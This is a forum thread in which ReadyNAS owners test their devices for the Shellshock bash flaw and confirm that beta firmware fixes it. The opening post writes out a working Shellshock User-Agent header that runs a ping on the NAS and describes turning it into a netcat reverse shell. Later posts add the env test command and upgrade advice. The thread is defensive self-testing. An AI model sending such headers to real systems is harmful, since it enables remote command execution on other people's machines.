BASH exploit - Shellshock

Hi, new user curious about any new firmware update for Ultra 4 (4.2.27 with fixes for heartbleed/BASH?).

I have confirmed my NV+ (Sparc) is vulnerable when you visit the shares url (but not the admin url). You can test this by modifying the User-Agent string in a browser with some of the code required to exploit vulnerable bash. In this case I used a simple ping command to do it and watched the target machine using tcpdump.

User-Agent: () { :; }; /bin/bash -c "ping -c 5 [ip address]"

I also modified the string to spawn a netcat session back to a listener (reverse shell). Netcat is not installed by default so that did not work. So as an experiment i installed it and found that the default sparc debian package includes the -e option for netcat and made it trivial to open a shell with a fairly simple modification to the User-Agent string.

I tried to update packages and install a newer bash, but I think that the sparc debian packages are not updated yet.

:~# bash -version
GNU bash, version 2.05b.0(1)-release (sparc-unknown-linux-gnu)
Copyright (C) 2002 Free Software Foundation, Inc.

That's all I have done to test this so far.....

egeek install the 4.1.14 beta
or modify your sources list to use the 4.1.14 repository and update bash using apt-get

mdgm wrote:
egeek install the 4.1.14 beta or modify your sources list to use the 4.1.14 repository and update bash using apt-get

Thanks, I just caught up with the first few pages and have the beta firmware. On to my other devices now.......

All good with the beta firmware update.....No responses to my UA string attack or on the shell itself....

NAS# bash -version
GNU bash, version 2.05b.0(1)-release (sparc-unknown-linux-gnu)
Copyright (C) 2002 Free Software Foundation, Inc.
NAS:~# env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"
/bin/sh: warning: X: ignoring function definition attempt
/bin/sh: error importing function definition for `X'
stuff

PKing wrote:
Hi, new user curious about any new firmware update for Ultra 4 (4.2.27 with fixes for heartbleed/BASH?).

The 4.2.27 beta firmware addresses this: http://www.readynas.com/forum/viewtopic.php?f=51&t=70385

mdgm wrote:

schmitzm wrote: I'm probably running a rather dated version of RAIDiator on our NAS - can't check the version since I shut down frontview pretty much first thing when the news broke. Are there any update prerequisites for the current betas - i.e. requirement for a minimum release level? What model do you have? There shouldn't be an issue. Of course it is a good idea to ensure you have an up to date backup first. There is a very low chance that this vulnerability would be exploited especially if you don't forward ports to the NAS. That's not to say there isn't a way, but we haven't found any. However if you are concerned I would turn off port forwards until after updating to the beta with the patch (or a newer release)

My model is a NV+ (v1), firmware 4.1.4. Just saw the beta firmware installed OK on another of that kind - good to know. Backups are reasonably current but I'll make sure to sync everything up again before an upgrade. A bit of a worry is the tedious fsck I'm almost certainly facing on next reboot.

Port forwarding or not is not the issue - having the NAS exposed to a large untrusted internal network is what worries me most. I've added access controls in /etc/apache/frontview/httpd.conf and disabled anything I don't need for now.

You can probably guess that I have enabled ssh access on my NAS - will this be retained on upgrade? Is the enablerootssh addon still available for this firmware?

One last one - is the beta firmware patched to include the upstream patch bash205b-009 or bash205b-010?

Thanks for your help and encouragement!

wtriba wrote:
schmitzm wrote: wtriba wrote: I'd like to install 4.1.14 beta on my NV+. Is there a direct link to download this? Thanks! http://www.readynas.com/download/beta/raidiator/4.1.14/RAIDiator-4.1.14-T5 The FW update to 4.1.14-T5 went fine on my NV+ (v1) and all is well. Confirmed shellshock is no longer an issue with this release. Thank you!

Thanks for reporting your success - while I've got some way towards cross-compiling a 2.05b bash that might work, it's nowhere near as straightforward to be a guaranteed success. The firmware upgrade is sure a safer way!

SSH access is retained on upgrade, yes.

Your modifications to httpd.conf may be overwritten so you should backup your changes to that.

mdgm wrote:
SSH access is retained on upgrade, yes. Your modifications to httpd.conf may be overwritten so you should backup your changes to that.

Thanks - the httpd.conf mods I can quickly redo now that I've refreshed my memory on the syntax.